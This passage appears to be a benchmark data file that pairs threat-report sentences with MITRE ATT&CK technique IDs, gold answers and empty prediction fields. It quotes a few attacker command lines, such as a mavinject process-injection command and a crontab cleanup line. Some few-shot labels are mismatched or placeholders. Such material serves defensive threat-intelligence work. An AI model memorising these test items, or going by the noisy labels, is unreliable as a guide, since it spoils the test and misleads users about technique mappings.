threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: MuddyWater has distributed URLs in phishing e-mails that link to lure documents.\n\t - T1204.001: User Execution - Malicious Link\n- Text: In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor\n\t - T1598.003: Phishing for Information - Spearphishing Link\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n", + "input": "Grandoreiro has been spread via malicious links embedded in e-mails.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Net commands used with the \"/domain\" flag can be used to gather information about and manipulate user accounts on the current domain.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem /domain\" and \"net group domain admins /domain\".\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: RATANKBA uses the \"net user\" command.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "BRONZE BUTLER has used \"net user /domain\" to identify account information.", + "gold": "- T1087.002: Account Discovery - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "Kimsuky has hosted content used for targeting efforts via web services such as Blogspot.", + "gold": "- T1583.006: Acquire Infrastructure - Web Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign\n\t - T1068: Exploitation for Privilege Escalation\n- Text: UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: AppleSeed can gain system level privilege by passing \"SeDebugPrivilege\" to the \"AdjustTokenPrivilege\" API.\n\t - T1134: Access Token Manipulation\n", + "input": "FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AADInternals can enumerate Azure AD users.\n\t - T1087.004: Account Discovery - Cloud Account\n- Text: APT29 can create new users through Azure AD.\n\t - T1136.003: Create Account - Cloud Account\n- Text: Peirates can use stolen service account tokens to perform its operations.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n", + "input": "APT29 has conducted enumeration of Azure AD accounts.", + "gold": "- T1087.004: Account Discovery - Cloud Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: But Ryuk isn\u2019t new to us\u2026 we\u2019ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)\u2014especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including \u201cWIZARD SPIDER,\u201d \u201cUNC1878,\u201d and \u201cTeam9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others\n\t - T1047: Windows Management Instrumentation\n\t - T1018: Remote System Discovery\n- Text: No matching sample found for T1562.003\n", + "input": "Hancitor has used PowerShell to execute commands.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has queried the registry to detect recent PuTTY sessions.\n\t - T1012: Query Registry\n- Text: These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails\n\t - T1135: Network Share Discovery\n- Text: Conti has the ability to discover hosts on a target network.\n\t - T1018: Remote System Discovery\n", + "input": "PlugX can enumerate and query for information contained within the Windows Registry.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server. It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2\n\t - T1123: Audio Capture\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1008: Fallback Channels\n- Text: Crimson can capture webcam video on targeted systems.\n\t - T1125: Video Capture\n", + "input": "Revenge RAT has a plugin for screen capture.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: JHUHUGIT has registered itself as a service to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: PROMETHIUM has named services to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.\n\t - T1037.004: Boot or Logon Initialization Scripts - RC Scripts\n", + "input": "RainyDay can use services to establish persistence.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.\n\t - T1005: Data from Local System\n- Text: Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.\n\t - T1135: Network Share Discovery\n", + "input": "During Operation Wocao, threat actors exfiltrated files and directories of interest from the targeted system.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.\n\t - T1083: File and Directory Discovery\n- Text: Mustang Panda's PlugX variant has created a hidden folder on USB drives named \"RECYCLE.BIN\" to store malicious executables and collected data.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: No matching sample found for T1562.003\n", + "input": "CookieMiner has looked for files in the user's home directory with \"wallet\" in their name using \"find\".", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The dropper installs the Bisonal EXE file and decoy PDF file. These files are not encrypted and the offset to the EXE and PDF file in the dropper is appended at the end of the dropper file. The file name of the decoy file is based on the dropper file name. The dropper code creates a PDF at the same directory, give the same name with itself to the decoy file, removes .exe and adds .pdf in the code. The dropper also creates two VBS scripts in the %Temp% directory with a random 4 digits hexadecimal name. The other deletes the dropper and the VBS script itself\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants\n\t - T1056.001: Input Capture - Keylogging\n\t - T1113: Screen Capture\n- Text: DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "WINDSHIELD is capable of file deletion along with other file system interaction.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 2) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers\n\t - T1046: Network Service Discovery\n- Text: shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit\n\t - T1210: Exploitation of Remote Services\n- Text: MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).\n\t - T1190: Exploit Public-Facing Application\n", + "input": "BackdoorDiplomacy has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1105: Ingress Tool Transfer\n\t - T1083: File and Directory Discovery\n- Text: leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Patchwork used Visual Basic Scripts (VBS) on victim machines.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Blue Mockingbird has used batch script files to automate execution and deployment of payloads.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom.\n\t - T1486: Data Encrypted for Impact\n- Text: The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: No matching sample found for T1048.001\n", + "input": "DCSrv has encrypted drives using the core encryption mechanism from DiskCryptor.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOKKI has established persistence by writing the payload to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Xbash can use regsvr32 for executing scripts.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: CORESHELL is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n", + "input": "Hi-Zor executes using regsvr32.exe called from the Registry Run Keys / Startup Folder persistence mechanism.", + "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Higaisa used \"cmd.exe\" for execution.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: 5) Downloads the \u2018kinsing\u2019 malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3).\n\t - T1059: Command and Scripting Interpreter\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "InvisiMole can launch a remote shell to execute commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pteranodon can use HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.\n\t - T1571: Non-Standard Port\n- Text: CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.\n\t - T1572: Protocol Tunneling\n", + "input": "LitePower can use HTTP and HTTPS for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of downloading additional files through C2 channels, including a new version of itself.\n\t - T1105: Ingress Tool Transfer\n- Text: malicious spearphishing payloads are executed as . has also used during and.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services\n\t - T1055: Process Injection\n- Text: It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1027: Obfuscated Files or Information\n- Text: Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\" /c mavinject.exe 568 /injectrunning c:\\Drivers\\DriverGFY.db\"\n\t - T1218.013: System Binary Proxy Execution - Mavinject\n", + "input": "HTRAN can inject into into running processes.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Felismus uses HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors\u2019 S3 bucket.\n\t - T1008: Fallback Channels\n", + "input": "Explosive has used HTTP for communication.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.\n\t - T1102: Web Service\n- Text: Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.\n\t - T1530: Data from Cloud Storage\n- Text: Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.\n\t - T1583.006: Acquire Infrastructure - Web Services\n", + "input": "CharmPower can download additional modules from actor-controlled Amazon S3 buckets.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit.\n\t - T1539: Steal Web Session Cookie\n\t - T1555: Credentials from Password Stores\n- Text: FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.\n\t - T1566.003: Phishing - Spearphishing via Service\n- Text: TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "Carberp's passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.", + "gold": "- T1555: Credentials from Password Stores", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.\n\t - T1606.001: Forge Web Credentials - Web Cookies\n- Text: Mandiant identified a campaign where the threat actors gained access to the target organization\u2019s Microsoft 365 environment using a stolen session token. Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with CRYPTBOT, an info-stealer malware, shortly before the stolen session token was generated. Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or \u201ccracked\u201d, software.\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n- Text: APT29 has used repeated MFA requests to gain access to victim accounts.\n\t - T1621: Multi-Factor Authentication Request Generation\n", + "input": "UNC2452 bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.", + "gold": "- T1606.001: Forge Web Credentials - Web Cookies", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taidoor can query the Registry on compromised hosts using \"RegQueryValueExA\".\n\t - T1012: Query Registry\n- Text: BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.\n\t - T1112: Modify Registry\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n", + "input": "Dtrack can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Newer variants of BACKSPACE will encode C2 communications with a custom system.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: Messages are encrypted using AES with a static key\n\t - T1027: Obfuscated Files or Information\n- Text: BLUELIGHT has encoded data into a binary blob using XOR.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Small Sieve has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Determine whether the victim\u2019s host machine is running Windows with an x86 or x64 architecture. Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine\n\t - T1082: System Information Discovery\n- Text: Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The 